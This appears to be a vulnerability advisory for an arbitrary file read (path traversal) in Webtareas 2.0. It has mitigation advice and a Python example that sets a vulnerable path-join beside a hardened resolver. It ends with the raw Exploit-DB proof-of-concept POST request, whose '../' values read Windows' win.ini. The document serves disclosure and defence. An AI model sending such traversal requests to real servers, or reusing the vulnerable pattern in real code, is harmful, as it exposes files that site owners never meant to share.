Vendor: Webtareas
Author: China Banking and Insurance Information Technology Management Co.,Ltd.
CVSS: 7.5 (HIGH)
Vulnerability Type: Arbitrary File Read
CWE: 22
Product Name: Webtareas
Affected Version From: Webtareas v2.0
Affected Version To: Webtareas v2.0
Patch Exists: NO
Related CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory, "Path Traversal")
CPE: a:webtareas:webtareas:2.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows
Published: 2020 (Exploit-DB entry dated 2020-04-12)

Webtareas 2.0 – Arbitrary File Read (the Exploit-DB entry spells the product "Webtateas")

An attacker sends a crafted POST request to /webtareas/includes/general_serv.php with action=cardview-actions, prefix=../ and extpath=../../../../Windows/win.ini. The prefix and extpath values are used to build the path of the file the card view reads, and nothing normalises that path or checks that it stays inside the intended directory, so the ../ segments climb out of the application directory and the contents of C:\Windows\win.ini come back in the response. Any other file the web server process can read is exposed the same way; only the number of ../ segments and the target name change. Note that the captured request carries a webTareasSID session cookie; the advisory does not say whether the request also succeeds without a valid session, so assume a logged-in user is needed until tested otherwise.

Mitigation:

No vendor patch is listed. Treat prefix and extpath as untrusted input: resolve the combined path to its canonical form (realpath), and reject any result that is not inside the directory the card view is meant to serve. Better still, stop accepting a path at all and map the request to an allow-list of file names. Reject absolute paths and any value containing '..', and run the web server under an account that cannot read files outside the application directory, so that a traversal that slips through exposes as little as possible.
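The pair of functions below is an added example (Python, not webTareas' own PHP) of the canonicalise-then-check control described above, placed next to the concatenation pattern that produces the bug. The directory layout, file names and `safe_resolve` name are constructed for the illustration; the input it is fed mirrors the advisory's prefix=../ plus extpath=../... shape.

```python
"""Added example: vulnerable path concatenation beside a hardened resolver.
Illustrative Python, not webTareas code; file names are constructed."""
import os
import tempfile


def vulnerable_open(base_dir, prefix, extpath):
    """Vulnerable pattern: user-controlled prefix and extpath are joined onto
    the base directory with no canonicalisation, so '../' escapes it."""
    with open(os.path.join(base_dir, prefix + extpath), "rb") as fh:
        return fh.read()


def safe_resolve(base_dir, user_path):
    """Return the canonical path of user_path under base_dir, or raise.

    realpath() collapses '..' and follows symlinks before the check, so a
    link inside base_dir that points outside it is rejected too. An absolute
    user_path replaces base_dir in os.path.join and is caught the same way.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # Windows: different drives can never be inside base
        inside = False
    if not inside:
        raise PermissionError(f"path escapes {base}: {user_path!r}")
    return candidate


def safe_open(base_dir, prefix, extpath):
    """Hardened replacement for vulnerable_open()."""
    with open(safe_resolve(base_dir, prefix + extpath), "rb") as fh:
        return fh.read()


def demo():
    """Build a throwaway tree, feed advisory-shaped input to both functions and
    return (bytes leaked by the vulnerable one, whether the safe one refused,
    bytes the safe one returns for a legitimate in-directory request)."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "webtareas", "includes")
        os.makedirs(os.path.join(base, "cards"))
        with open(os.path.join(base, "cards", "ok.txt"), "w") as fh:
            fh.write("card data")
        with open(os.path.join(root, "secret.ini"), "w") as fh:   # outside base
            fh.write("[fonts]\n")
        leaked = vulnerable_open(base, "../", "../secret.ini")
        try:
            safe_open(base, "../", "../secret.ini")
            blocked = False
        except PermissionError:
            blocked = True
        legit = safe_open(base, "", "cards/ok.txt")
        return leaked, blocked, legit


if __name__ == "__main__":
    leaked, blocked, legit = demo()
    print("vulnerable_open leaked:", leaked)
    print("safe_open refused traversal:", blocked)
    print("safe_open served legitimate file:", legit)
```

The check compares canonical paths rather than searching the input for "..", because encodings, mixed separators and symlinks can all defeat a string match while still producing a path outside the base directory after resolution.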

Exploit-DB raw data:

# Exploit Title: Webtateas 2.0 - Arbitrary File Read
# Date: 2020-04-12
# Exploit Author: China Banking and Insurance Information Technology Management Co.,Ltd.
# Vendor Homepage: http://webtareas.sourceforge.net/general/home.php
# Software Link: http://webtareas.sourceforge.net/general/home.php
# Version: Webtateas v2.0
# Tested on: Windows
# CVE : N/A

Vulnerable Request:
POST /webtareas/includes/general_serv.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 72
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/webtareas/general/home.php?
Cookie: webTareasSID=k2vicb6pn9gsajncg3l6ltbver
DNT: 1

action=cardview-actions&prefix=..%2F&extpath=../../../../Windows/win.ini